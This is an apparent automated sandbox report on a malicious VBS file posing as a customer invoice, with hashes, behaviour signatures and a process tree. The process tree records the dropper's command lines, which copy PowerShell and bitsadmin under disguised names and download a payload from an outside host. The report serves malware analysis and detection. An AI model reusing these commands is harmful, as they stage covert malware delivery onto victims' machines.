Analysis
- max time kernel: 63s
- max time network: 33s
- platform: windows7_x64
- resource: win7
- submitted: 13-07-2020 07:40
Static task: static1

Behavioral task: behavioral1
- Sample: Fatt_cliente_07008120482.vbs
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: Fatt_cliente_07008120482.vbs
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Fatt_cliente_07008120482.vbs
- Size: 4KB
- MD5: 740e42ba34a3eb4f22a7f2ce3a738a5c
- SHA1: ad8a96ca8d57f0d18ff06366d507d547deb051b0
- SHA256: 1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
- SHA512: f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54
- Score: 8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes: WScript.exe

  description                        pid   process      target process
  PID 1124 wrote to memory of 608    1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 608    1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 608    1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 1480   1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 1480   1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 1480   1124  WScript.exe  cmd.exe
  PID 1124 wrote to memory of 912    1124  WScript.exe  wubvVZY.exe
  PID 1124 wrote to memory of 912    1124  WScript.exe  wubvVZY.exe
  PID 1124 wrote to memory of 912    1124  WScript.exe  wubvVZY.exe
  PID 1124 wrote to memory of 912    1124  WScript.exe  wubvVZY.exe

- Executes dropped EXE (1 IoCs)
  Processes: wubvVZY.exe

  pid   process
  912   wubvVZY.exe
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 1124

  - C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe
    PID: 608

  - C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe
    PID: 1480

  - C:\Users\Admin\AppData\Roaming\wubvVZY.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg
    Signatures: Executes dropped EXE
    PID: 912